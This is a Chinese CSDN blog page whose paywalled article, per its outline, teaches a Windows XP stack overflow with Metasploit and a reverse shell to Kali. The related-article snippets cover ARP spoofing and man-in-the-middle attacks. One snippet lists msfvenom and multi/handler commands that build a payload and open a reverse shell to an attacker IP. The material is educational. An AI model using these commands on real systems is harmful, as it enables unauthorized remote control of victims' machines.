[网络安全自学篇] 五十三.Windows系统安全之Metasploit实现栈溢出攻击及反弹shell原理解析

最新推荐文章于 2024-01-22 14:57:39 发布
最新推荐文章于 2024-01-22 14:57:39 发布
阅读量1.3w 收藏 33
点赞数 16
分类专栏: 网络安全自学篇 文章标签: 系统安全 软件安全 Windows漏洞利用 栈溢出 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Eastmount/article/details/104573931
版权
网络安全自学篇 专栏收录该内容
118 篇文章 3335 订阅 ¥49.90 ¥99.00
订阅专栏

这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了虚拟机基础知识,包括XP操作系统安装、文件共享设置、网络快照及网络设置等。这篇文章将讲解了如果搭建XP和Kali环境,并通过Windows漏洞实现栈溢出攻击,通过Metasploit反弹shell,从而Kali系统获取了XP系统的shell。该栈溢出的具体流程包括:

  • XP系统与Kali网络配置
  • 实现简单栈溢出实验,使用Msfconsole进入msf控制台
  • 任意非00的指令覆盖buffer和EBP
  • 从程序已经加载的dll中获取他们的jmp esp指令地址
  • 使用jmp esp的指令地址覆盖ReturnAddress
  • 从下一行开始填充Shellcode
  • 编写Ruby攻击脚本提权

在这里插入图片描述

作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~

PS:本文参考了安全网站和参考文献中的文章(详见参考文献),并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。

下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study
工具地址:https://github.com/eastmountyxz/Security-Software-Based


文章目录

了解本专栏 订阅专栏 解锁全文
Eastmount
关注
  • 16
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
订阅专栏
Arp中间人攻击原理
lyzaishang的博客
03-10 2251
1、 实践内容 设计并实现ARP攻击 可以设计并实现其他攻击 2、 实践过程 1) 各部分说明 本机IP地址 本机MAC地址 目标IP地址 网关IP地址 2) ARP协议研究 ARP协议的全称为地址解析协议,是一种工作在网络层的协议,是一种将IP地址转换为MAC地址(物理地址)的协议因为在OSI七层模型中,IP地址在第三层网络层,传送的是IP数据报,mac地址在第二层数据链路层,传送的是数据帧,二层的以太网交换设备并不能识别32位的IP地址,它们是以48位以太网地址(就是我们常说的MAC地址)传输以太网数
53.Windows漏洞利用Metasploit实现栈溢出攻击反弹shell1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
【每天学习一点新知识】中间人攻击是什么
RexHa的博客
10-30 2447
中间人攻击(man-in-the-middle attack, abbreviated to MITM),顾名思义,就是攻击者躲在通信双方之间,窃听甚至篡改通信信息,而这个攻击是不可见的,通信双方并不知道消息已经被截获甚至篡改了。
Https协议简析及中间人攻击原理
weixin_30787531的博客
03-03 506
1、基础知识 1.1 对称加密算法 对称加密算法的特点是加密密钥和解密密钥是同一把密钥K,且加解密速度快,典型的对称加密算法有DES、AES等 对称加密算法加密流程和解密流程 1.2 非对称加密算法 非对称加密算法的特点是加密密钥K1和解密密钥K2是不一样的,他们是一对可互为加解密的密钥,一个...
中间人攻击之arp欺骗
m0_59598029的博客
08-11 750
中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”地址解析协议,即ARP(Address ResolutionProtocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;
ARP攻击原理
bobi1024的博客
12-29 4007
ARP攻击原理一.ARP攻击概述二.ARP攻击原理 一.ARP攻击概述 二.ARP攻击原理 但凡局域网存在ARP攻击,都说明网络存在“中间人” 在这个局域网里面,PC1、PC2、PC3三台主机共同连接到交换机SW1上面,对应3个接口port1/2/3。假设PC3这台主机安装了ARP攻击软件或遭受ARP病毒,成为这个网络的攻击者( hacker),PC1和PC2是如何通信的。 PC1需要跟PC2通信,通过ARP请求包询问PC2的MAC地址,由于采用广播形式,所以交换机将ARP请求包从接口P1广播到P2和
基于MetaSploit的网络攻击研究(37页16263字数).doc
06-22
本文从网络安全现状入手,深入分析网络攻击的根源,对网络攻击原理进行深入、细致剖析,全面分类阐述网络攻击的主要手段与实现方法,对目前常见攻击手段和工具,做了细致的分析,给出了他们的特点和实施方法。...
第十四节 渗透测试神器Metasploit之初体验(天融信网络安全课程)
09-23
第十四节 渗透测试神器Metasploit之初体验(天融信网络安全课程)
当Linux提权不能反弹Shell时利用metasploit进行提权.txt
03-18
当Linux提权不能反弹Shell时利用metasploit进行提权.txt
Metasploit网络攻击样例解析.pptx
01-05
网络渗透攻击与普通网络攻击的不同在于它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。为了实现渗透攻击攻击者采用的攻击方式绝不仅此于一种简单的Web脚本...
[网络安全]中间人攻击
神隐寻觅的博客
12-08 5113
中间人攻击 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。 中间人攻击主要有会话劫持、DNS欺骗两种 一、会话劫持 会话劫持利用了TCP/IP工作原理来设计攻击。TCP会话劫持的攻击方式可以对基于TCP的任何应用发起攻击,如HTTP、FTP、Telnet等。 实现流程 对于攻击者来说,所必须要做的就是窥探到正在进行
arp欺骗——中间人攻击
一大口木的博客
04-26 363
准备工作:ftp服务器的下载、3台计算机(1台本机(我的是win10),2台虚拟机(1kali和1随意))下面就是ftpserver服务器的软件,放在自己的本机上就行链接:https://pan.baidu.com/s/16rsbwGNPj_DtKQUPmVXf-w?pwd=zzea提取码:zzea两台虚拟机我本机上放的ftp服务器自己先调整好网络,我虚拟机用的net,kali的IP为虚拟机——window的ip为本主机net网卡的ip为192.168.10.1。
7.13、中间人攻击(ARP欺骗)
最新发布
qq_33782021的博客
01-22 1140
地址解析协议(Address Resolution Protocol,ARP),负责把目的主机的IP 地址解析成目的MAC地址,地址解析的目标就是发现逻辑地址与物理地址的映射关系。网络中的计算机、交换机、路由器等都会定期维护自己的ARP缓存表。为什么需要ARP? 在发送者给其他的网络设备发送数据的时候, 是以数据帧的形式发送的,数据帧是由源MAC地址和目的MAC地址组成的,如果发送者只知道目的主机的IP地址, 不知道目的主机的MAC地址, 就不能把这个数据包转化成数据帧发走。
ARP 中间人原理参考
q1009020096的博客
08-09 222
ARP 中间人原理参考。
中间人攻击原理实现
dayeti3883的博客
05-08 773
看风云无忌一时有些迟疑。 那男子冷笑道:“你是新飞升的吧。妖魔吃人,人吃妖魔,这个道理你迟早会明白。莽莽大地,除却那植物之外,所有行走之物,均强于人类。你若是想不通,以后就和一些低等妖兽一般,去吃那树上的野果吧。” ——飞升之后 ·荧惑 风云无忌 ·这是本文版本v1.1全部代码,添加了更充分的错误显示信息和使用方法: 1 #includ...
LINUX 中间人攻击之arp攻击(图文解说)
Alex_thomas的博客
11-19 6380
一、ARP攻击概述 ARP攻击,作为中间人攻击手段中的一种,一是可以实现对局域网中用户的断网攻击,二是可以获取到受害用户的数据流量包括浏览的网站,图片,甚至账号密码(PS:想想还是有点恐怖的!),接下来,让我先给你讲讲什么是ARP攻击的类型和原理吧! (一)ARP的原理 ARP,即Address Resolution Protocol,地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。简单来说,就是将IP地址转换为物理地址(PS:在一个局域网中主机之间的通信是通过物理地址来完成的,而不
5.2.2 利用arp中间人攻击获取管理员账号密码
robacco的博客
03-02 4517
一、arp协议简述: ARP即地址解析协议,用于IP地址到MAC地址的映射,即由目标IP找到对应的MAC地址。ARP协议特点是“广播请求,单播回应”。 二、arp欺骗原理:(看图,其中PC1和PC2为两台通信主机,PC3为“中间人”) 三、“中间人”攻击实践:这里借助p2p终结者工具进行arp欺骗 3.1 前期准备 ...
利用arpspoof 实现断网攻击和中间人(MITM)攻击
T159558556的博客
03-21 847
ArpSpoof 是一款进行局域网arp欺骗工具,Kali linux中自带了该工具,也可以自行安装。ARP断网攻击发生在局域网,目标主机和攻击机处于同一局域网,二者互相ping通。
metasploit 反弹shell
10-16
Metasploit 是一款常用的渗透测试工具,可以用来测试网络安全反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set PAYLOAD <payload> set LHOST <attacker IP> set LPORT <attacker port> run ``` 其中,`<payload>` 是要使用的 payload,常用的有 `windows/meterpreter/reverse_tcp`、`linux/x86/meterpreter/reverse_tcp` 等;`<attacker IP>` 是攻击者的 IP 地址;`<attacker port>` 是攻击者监听的端口号。 2. 在目标机器上执行以下命令: ``` msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> > shell.<format> ``` 其中,`<payload>`、`<attacker IP>`、`<attacker port>` 与上面的命令相同;`<format>` 是输出格式,常用的有 `exe`、`elf`、`asp` 等。 3. 将生成的 shell 文件上传到目标机器上,并执行以下命令: ``` ./shell.<format> ``` 4. 回到 Metasploit 控制台,可以看到已经成功反弹shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eastmount

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值